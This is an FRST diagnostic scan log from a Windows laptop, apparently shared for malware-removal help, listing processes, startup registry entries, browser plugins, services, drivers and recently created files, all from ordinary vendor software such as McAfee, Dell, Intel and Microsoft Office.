(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\systemcore\mfemms.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(Intel Security, Inc.) C:\Program Files\Common Files\Intel Security\PEF\CORE\PEFService.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\AMCore\mcshield.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\systemcore\mfefire.exe
(McAfee, Inc.) C:\Program Files\mcafee\msc\McAPExe.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\systemcore\mfefire.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Waves Audio Ltd.) C:\Program Files\Realtek\Audio\HDA\WavesSvc64.exe
(Dell Inc.) C:\Program Files\Dell\QuickSet\quickset.exe
(CyberLink) C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\BTStackServer.exe
() C:\Program Files (x86)\Dropbox\DropboxOEM\DropboxOEM.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Microsoft) C:\Program Files (x86)\Dell Customer Connect\OTBSurvey.exe
(Dell) C:\Program Files\Dell\Dell Foundation Services\DFSSvc.exe
(Dell Products, LP.) C:\Program Files (x86)\Dell Digital Delivery\DeliveryService.exe
(Dell Inc.) C:\Program Files (x86)\Dell Update\DellUpService.exe
(Dell Inc.) C:\Program Files (x86)\Dell Update\DellUpTray.exe
(Dell) C:\Program Files\Dell\Dell Foundation Services\DFS.Common.Agent.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\CSP\1.9.741.0\McCSPServiceHost.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\ModuleCore\ModuleCoreService.exe
() C:\Program Files\Dell\My Dell Learning Center\MDLCSvc.exe
(CyberLink) C:\Program Files (x86)\CyberLink\Shared files\RichVideo.exe
(SoftThinks SAS) C:\Program Files (x86)\Dell Backup and Recovery\sftservice.exe
(Adobe Systems Incorporated) C:\Windows\System32\Macromed\Flash\FlashUtil_ActiveX.exe
(SoftThinks - Dell) C:\Program Files (x86)\Dell Backup and Recovery\toaster.exe
(Microsoft Corporation) C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
(SoftThinks - Dell) C:\Program Files (x86)\Dell Backup and Recovery\Components\Shell\dbrsync.exe
(McAfee, Inc.) C:\Program Files\mcafee.com\agent\mcupdate.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\platform\McUICnt.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [7637208 2014-07-09] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1387736 2014-07-05] (Realtek Semiconductor)
HKLM\...\Run: [WavesSvc] => C:\Program Files\Realtek\Audio\HDA\WavesSvc64.exe [562264 2014-04-10] (Waves Audio Ltd.)
HKLM\...\Run: [QuickSet] => c:\Program Files\Dell\QuickSet\QuickSet.exe [3777696 2014-01-17] (Dell Inc.)
HKLM-x32\...\Run: [DropboxOEM] => C:\Program Files (x86)\Dropbox\DropboxOEM\DropboxOEM.exe [462160 2014-09-02] ()
ShellIconOverlayIdentifiers: [DBRShellOverlayBackupFile] -> {831CEBDD-6BAF-4432-BE76-9E0989C14AEF} => C:\Program Files (x86)\Dell Backup and Recovery\Components\Shell\DBROverlayIconBackuped.dll [2015-12-08] (SoftThinks SAS)
ShellIconOverlayIdentifiers: [DBRShellOverlayModifiedBackupFile] -> {275E4FD7-21EF-45CF-A836-832E5D2CC1B3} => C:\Program Files (x86)\Dell Backup and Recovery\Components\Shell\DBROverlayIconNotBackuped.dll [2015-12-08] (SoftThinks SAS)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Bluetooth.lnk [2015-06-07]
ShortcutTarget: Bluetooth.lnk -> C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe (Broadcom Corporation.)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.43.1
Tcpip\..\Interfaces\{28CEFB91-FA63-4200-9B83-6978147A71A0}: [DhcpNameServer] 192.168.43.1
Tcpip\..\Interfaces\{812A2ED5-72C3-4457-9E4D-A562956307C8}: [DhcpNameServer] 192.168.0.1

Internet Explorer:
==================
HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.co.za/
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2016-07-06] (Microsoft Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2016-07-06] (Microsoft Corporation)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-07-06] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-07-06] (Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-07-06] (Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-07-06] (Microsoft Corporation)
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\mcafee\msc\McSnIePl64.dll [2016-05-24] (McAfee, Inc.)
Filter-x32: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files (x86)\McAfee\msc\McSnIePl.dll [2016-05-24] (McAfee, Inc.)

FireFox:
========
FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL [2016-05-24] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-12-10] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-12-10] (Intel Corporation)
FF Plugin-x32: @mcafee.com/MSC,version=10 -> c:\PROGRA~2\mcafee\msc\NPMCSN~1.DLL [2016-05-24] ()
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2016-07-06] (Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2016-05-03] (Adobe Systems Inc.)

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S2 BcmBtRSupport; C:\Windows\system32\BtwRSupportService.exe [2251992 2015-06-07] (Broadcom Corporation.)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [2944768 2016-06-10] (Microsoft Corporation)
R2 Dell Customer Connect; C:\Program Files (x86)\Dell Customer Connect\OTBSurvey.exe [141704 2015-02-04] (Microsoft)
R2 Dell Foundation Services; C:\Program Files\Dell\Dell Foundation Services\DFSSvc.exe [119656 2016-01-15] (Dell)
S3 DellProdRegManager; C:\Program Files (x86)\Dell Product Registration\regmgrsvc.exe [293440 2014-04-01] (Aviata, Inc.)
R2 DellUpdate; C:\Program Files (x86)\Dell Update\DellUpService.exe [237272 2015-08-27] (Dell Inc.)
R2 HomeNetSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [599864 2016-04-23] (McAfee, Inc.)
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [318568 2014-10-01] (Intel Corporation)
R2 Intel® Capability Licensing Service Interface; c:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel® Corporation) [File not signed]
S3 Intel® Capability Licensing Service TCP IP Interface; c:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel® Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [169432 2013-12-10] (Intel Corporation)
R2 McAPExe; C:\Program Files\McAfee\MSC\McAPExe.exe [989192 2016-05-24] (McAfee, Inc.)
S3 McAWFwk; c:\Program Files\Common Files\mcafee\ActWiz\McAWFwk.exe [334608 2013-07-25] (McAfee, Inc.)
R2 McBootDelayStartSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [599864 2016-04-23] (McAfee, Inc.)
R2 mccspsvc; C:\Program Files\Common Files\McAfee\CSP\1.9.741.0\\McCSPServiceHost.exe [1903320 2016-04-18] (McAfee, Inc.)
R2 McNaiAnn; C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe [599864 2016-04-23] (McAfee, Inc.)
S3 McODS; C:\Program Files\mcafee\VirusScan\mcods.exe [795528 2016-04-20] (McAfee, Inc.)
S2 McOobeSv2; C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe [599864 2016-04-23] (McAfee, Inc.)
R2 mcpltsvc; C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe [599864 2016-04-23] (McAfee, Inc.)
R2 McProxy; C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe [599864 2016-04-23] (McAfee, Inc.)
R2 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [232688 2016-03-07] (McAfee, Inc.)
R2 mfemms; C:\Program Files\Common Files\McAfee\SystemCore\\mfemms.exe [382456 2016-04-01] (McAfee, Inc.)
R2 mfevtp; C:\Windows\system32\mfevtps.exe [277744 2016-03-07] (McAfee, Inc.)
R2 ModuleCoreService; C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe [1424352 2016-04-21] (McAfee, Inc.)
R2 My Dell Learning Center; C:\Program Files\Dell\My Dell Learning Center\MDLCSvc.exe [22528 2015-01-22] () [File not signed]
R2 PEFService; C:\Program Files\Common Files\Intel Security\PEF\CORE\PEFService.exe [1029856 2016-04-21] (Intel Security, Inc.)
R2 RichVideo; C:\Program Files (x86)\CyberLink\Shared files\RichVideo.exe [253776 2013-07-30] (CyberLink)
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [290520 2014-01-08] (Realtek Semiconductor)
R2 SftService; C:\Program Files (x86)\Dell Backup and Recovery\SftService.exe [2065808 2016-01-04] (SoftThinks SAS)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [368632 2015-06-07] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23792 2015-06-07] (Microsoft Corporation)
S2 0106601467779372mcinstcleanup; C:\Windows\TEMP\010660~1.EXE -cleanup -nolog [X]

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 bcbtums; C:\Windows\system32\drivers\bcbtums.sys [170712 2015-06-07] (Broadcom Corporation.)
R3 BCM43XX; C:\Windows\system32\DRIVERS\bcmwl63a.sys [7569112 2015-06-07] (Broadcom Corporation)
S3 cfwids; C:\Windows\System32\drivers\cfwids.sys [78632 2016-03-11] (McAfee, Inc.)
R1 CLVirtualDrive; C:\Windows\system32\DRIVERS\CLVirtualDrive.sys [91712 2013-03-05] (CyberLink)
R3 DellRbtn; C:\Windows\System32\drivers\DellRbtn.sys [10752 2013-01-25] (OSR Open Systems Resources, Inc.)
S0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation)
R3 MEIx64; C:\Windows\System32\drivers\TeeDriverx64.sys [100312 2013-12-10] (Intel Corporation)
R3 mfeaack; C:\Windows\System32\drivers\mfeaack.sys [419624 2016-03-11] (McAfee, Inc.)
R3 mfeavfk; C:\Windows\System32\drivers\mfeavfk.sys [349480 2016-03-11] (McAfee, Inc.)
S0 mfeelamk; C:\Windows\System32\drivers\mfeelamk.sys [83608 2016-03-11] (McAfee, Inc.)
R3 mfefirek; C:\Windows\System32\drivers\mfefirek.sys [493352 2016-03-11] (McAfee, Inc.)
R0 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [842536 2016-03-11] (McAfee, Inc.)
R3 mfencbdc; C:\Windows\System32\DRIVERS\mfencbdc.sys [543488 2016-02-10] (McAfee, Inc.)
S3 mfencrk; C:\Windows\System32\DRIVERS\mfencrk.sys [109480 2016-02-10] (McAfee, Inc.)
R0 mfewfpk; C:\Windows\System32\drivers\mfewfpk.sys [243496 2016-03-11] (McAfee, Inc.)
R3 SynRMIHID; C:\Windows\system32\DRIVERS\SynRMIHID.sys [42664 2015-01-10] (Synaptics Incorporated)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [35320 2015-06-07] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [258368 2015-06-07] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114496 2015-06-07] (Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-07-06 20:02 - 2016-07-06 20:02 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee
2016-07-06 19:25 - 2016-07-06 20:01 - 00000862 _____ C:\Users\Melinda\Desktop\Fixlog.txt
2016-07-06 18:43 - 2016-07-06 18:43 - 00000000 ____D C:\Users\Melinda\Documents\CyberLink
2016-07-06 18:43 - 2016-07-06 18:43 - 00000000 ____D C:\Users\Melinda\AppData\Roaming\CyberLink
2016-07-06 18:41 - 2016-07-06 18:41 - 00000000 ____D C:\Users\Melinda\AppData\Local\CyberLink
2016-07-06 17:12 - 2016-07-06 17:15 - 3532914688 _____ C:\Users\Melinda\Documents\Windows.iso
2016-07-06 16:17 - 2016-07-06 18:36 - 00003846 _____ C:\Windows\System32\Tasks\Intel Security DAT Reputation (AMCore) periodic endpoint safety pulse
2016-07-06 16:17 - 2016-07-06 16:17 - 00004020 _____ C:\Windows\System32\Tasks\Intel Security DAT Reputation (AMCore) Post DAT update endpoint safety pulse
2016-07-06 14:48 - 2015-07-17 15:51 - 00984448 _____ (Microsoft Corporation) C:\Windows\system32\ucrtbase.dll
2016-07-06 14:48 - 2015-07-17 15:51 - 00063840 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-private-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:51 - 00020832 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-math-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:51 - 00019808 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-multibyte-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:51 - 00017760 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-string-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:51 - 00017760 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-stdio-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:51 - 00016224 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-runtime-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:51 - 00015712 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-convert-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:51 - 00014176 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-time-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:51 - 00013664 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-filesystem-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:51 - 00012640 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-process-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:51 - 00012640 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-heap-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:51 - 00012640 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-conio-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:51 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-utility-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:51 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-locale-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:51 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-environment-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:47 - 00901264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ucrtbase.dll
2016-07-06 14:48 - 2015-07-17 15:47 - 00066400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-private-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:47 - 00022368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-math-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:47 - 00019808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-multibyte-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:47 - 00017760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-string-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:47 - 00017760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-stdio-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:47 - 00016224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-runtime-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:47 - 00015712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-convert-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:47 - 00014176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-time-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:47 - 00013664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-filesystem-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:47 - 00012640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-process-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:47 - 00012640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-heap-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:47 - 00012640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-conio-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:47 - 00012128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-utility-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:47 - 00012128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-locale-l1-1-0.dll
2016-07-06 14:48 - 2015-07-17 15:47 - 00012128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-environment-l1-1-0.dll
2016-07-06 14:26 - 2016-07-06 14:26 - 00002438 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Word 2016.lnk
2016-07-06 14:26 - 2016-07-06 14:26 - 00002437 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PowerPoint 2016.lnk
2016-07-06 14:26 - 2016-07-06 14:26 - 00002401 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Access 2016.lnk
2016-07-06 14:26 - 2016-07-06 14:26 - 00002400 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Excel 2016.lnk
2016-07-06 14:26 - 2016-07-06 14:26 - 00002394 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Outlook 2016.lnk
2016-07-06 14:26 - 2016-07-06 14:26 - 00002388 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Publisher 2016.lnk
2016-07-06 14:26 - 2016-07-06 14:26 - 00002380 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneNote 2016.lnk
2016-07-06 14:26 - 2016-07-06 14:26 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2016 Tools
2016-07-06 13:16 - 2016-07-06 13:16 - 00000000 ____D C:\Program Files\Microsoft Office 15
2016-07-06 12:36 - 2016-07-06 19:20 - 00000000 __RHD C:\ESD
2016-07-06 12:26 - 2016-07-06 12:26 - 00000000 ____D C:\Users\Melinda\AppData\Local\CEF
2016-07-06 12:25 - 2016-07-06 12:25 - 00003886 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2016-07-06 12:24 - 2016-07-06 12:24 - 00002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2016-07-06 12:24 - 2016-07-06 12:24 - 00002069 _____ C:\Users\Public\Desktop\Acrobat Reader DC.lnk
2016-07-06 12:24 - 2016-07-06 12:24 - 00000000 ____D C:\Program Files (x86)\Adobe
2016-07-06 12:23 - 2016-07-06 12:23 - 00000000 ____D C:\ProgramData\Adobe
2016-07-06 12:06 - 2016-07-06 12:06 - 00003510 _____ C:\Windows\System32\Tasks\{A79AE70B-3222-4200-AA0C-607D18CAF9F8}
2016-07-06 12:02 - 2016-07-06 12:02 - 00000000 ____H C:\Windows\system32\Drivers\Msft_User_WpdMtpDr_01_11_00.Wdf
2016-07-06 11:59 - 2016-07-06 12:26 - 00000000 ____D C:\Users\Melinda\AppData\Local\Adobe
2016-07-06 10:57 - 2016-07-06 10:57 - 00000000 ____D C:\ProgramData\Microsoft OneDrive
2016-07-06 10:32 - 2016-07-06 10:32 - 00720403 _____ C:\Users\Melinda\Desktop\ZA_DirectorsRemunerationGuide_10062015.pdf
2016-07-06 10:22 - 2016-07-06 10:22 - 00281695 _____ C:\Users\Melinda\Desktop\Notice_20_of_2016.pdf
2016-07-06 09:57 - 2016-07-06 09:57 - 00000000 ____H C:\Windows\system32\Drivers\Msft_User_WpdFs_01_11_00.Wdf
2016-07-06 09:42 - 2016-07-06 09:42 - 00000000 ____D C:\Windows\System32\Tasks\Aviata
2016-07-06 09:08 - 2016-07-06 19:34 - 00025161 _____ C:\Users\Melinda\Desktop\Addition.txt
2016-07-06 09:07 - 2016-07-06 20:03 - 00015005 _____ C:\Users\Melinda\Desktop\FRST.txt
2016-07-06 09:06 - 2016-07-06 20:03 - 00000000 ____D C:\FRST
2016-07-06 09:04 - 2016-07-06 09:05 - 02390016 _____ (Farbar) C:\Users\Melinda\Desktop\FRST64.exe
2016-07-06 08:14 - 2016-07-06 08:14 - 00003068 _____ C:\Windows\System32\Tasks\McAfeeLogon
2016-07-06 08:14 - 2016-07-06 08:14 - 00000000 ____D C:\Windows\System32\Tasks\McAfee
2016-07-06 08:13 - 2016-07-06 08:13 - 00000000 ____D C:\ProgramData\Intel Security
2016-07-06 08:12 - 2016-07-06 08:12 - 00000000 ____D C:\Program Files\Common Files\Intel Security
2016-07-06 07:58 - 2016-07-06 08:58 - 00003348 _____ C:\Windows\System32\Tasks\McAfee Remediation (Prepare)
2016-07-06 07:58 - 2016-07-06 07:58 - 00000000 ____D C:\Program Files\Common Files\AV
2016-07-06 07:57 - 2016-07-06 19:47 - 00003600 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-3305678368-1645044794-3837945535-1001
2016-07-06 07:55 - 2016-07-06 07:55 - 00000000 ____D C:\Program Files (x86)\Dell Digital Delivery
2016-07-06 07:54 - 2016-07-06 07:54 - 00000000 ____D C:\Users\Melinda\AppData\Roaming\Macromedia
2016-07-06 07:53 - 2016-07-06 07:53 - 00000000 __SHD C:\Users\Melinda\AppData\Local\EmieUserList
2016-07-06 07:53 - 2016-07-06 07:53 - 00000000 __SHD C:\Users\Melinda\AppData\Local\EmieSiteList
2016-07-06 07:53 - 2016-07-06 07:53 - 00000000 __SHD C:\Users\Melinda\AppData\Local\EmieBrowserModeList
2016-07-06 07:52 - 2016-07-06 12:26 - 00000000 ____D C:\Users\Melinda\AppData\Roaming\Adobe
2016-07-06 07:52 - 2016-07-06 08:02 - 00000000 ____D C:\Users\Melinda\AppData\Roaming\DropboxOEM
2016-07-06 06:44 - 2016-07-06 06:44 - 00000000 ____D C:\Windows\System32\Tasks\WPD
2016-07-06 06:44 - 2016-07-06 06:44 - 00000000 ____D C:\Users\Melinda\Documents\Bluetooth Exchange Folder
2016-07-06 06:44 - 2016-07-06 06:44 - 00000000 ____D C:\Users\Melinda\AppData\Local\DropboxOEM
2016-07-06 06:44 - 2016-07-06 06:44 - 00000000 ____D C:\Users\Melinda\AppData\Local\Broadcom
2016-07-06 06:43 - 2016-07-06 06:43 - 00000000 ____D C:\Users\Melinda\AppData\Local\Aviata
2016-07-06 06:37 - 2016-01-07 01:04 - 00000107 ____H C:\DBAR_Ver.txt
2016-07-06 06:34 - 2016-07-06 06:34 - 00003980 _____ C:\Windows\System32\Tasks\PCDoctorBackgroundMonitorTask
2016-07-06 06:34 - 2016-07-06 06:34 - 00003440 _____ C:\Windows\System32\Tasks\PCDEventLauncherTask
2016-07-06 06:34 - 2016-07-06 06:34 - 00003190 _____ C:\Windows\System32\Tasks\SystemToolsDailyTest
2016-07-06 06:30 - 2016-07-06 06:30 - 00000000 ____D C:\Users\Melinda\AppData\Local\Power2Go8
2016-07-06 06:29 - 2016-07-06 06:29 - 00000144 _____ C:\Windows\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2016-07-06 06:29 - 2016-07-06 06:29 - 00000000 __SHD C:\Users\Melinda\IntelGraphicsProfiles
2016-07-06 06:28 - 2016-07-06 06:28 - 00000020 ___SH C:\Users\Melinda\ntuser.ini
2016-07-06 02:56 - 2016-07-06 06:37 - 00000000 ____D C:\ProgramData\softthinks
2016-07-06 02:46 - 2016-07-06 02:46 - 00000000 _SHDL C:\Users\Default\My Documents
2016-07-06 02:46 - 2016-07-06 02:46 - 00000000 _SHDL C:\Users\Default\Documents\My Videos
2016-07-06 02:46 - 2016-07-06 02:46 - 00000000 _SHDL C:\Users\Default\Documents\My Pictures
2016-07-06 02:46 - 2016-07-06 02:46 - 00000000 _SHDL C:\Users\Default\Documents\My Music
2016-07-06 02:46 - 2016-07-06 02:46 - 00000000 _SHDL C:\Users\Default User\Documents\My Videos
2016-07-06 02:46 - 2016-07-06 02:46 - 00000000 _SHDL C:\Users\Default User\Documents\My Pictures
2016-07-06 02:46 - 2016-07-06 02:46 - 00000000 _SHDL C:\Users\Default User\Documents\My Music
2016-07-05 19:48 - 2016-07-06 02:55 - 00000000 ____D C:\20160705194811_BACKUP
2016-06-10 04:48 - 2016-06-10 04:48 - 00635120 _____ (Microsoft Corporation) C:\Windows\system32\msvcp140.dll
2016-06-10 04:48 - 2016-06-10 04:48 - 00390408 _____ (Microsoft Corporation) C:\Windows\system32\vccorlib140.dll
2016-06-10 04:48 - 2016-06-10 04:48 - 00333080 _____ (Microsoft Corporation) C:\Windows\system32\concrt140.dll
2016-06-10 04:48 - 2016-06-10 04:48 - 00088816 _____ (Microsoft Corporation) C:\Windows\system32\vcruntime140.dll
2016-06-10 03:07 - 2016-06-10 03:07 - 00439536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msvcp140.dll
2016-06-10 03:07 - 2016-06-10 03:07 - 00267008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vccorlib140.dll
2016-06-10 03:07 - 2016-06-10 03:07 - 00243480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\concrt140.dll
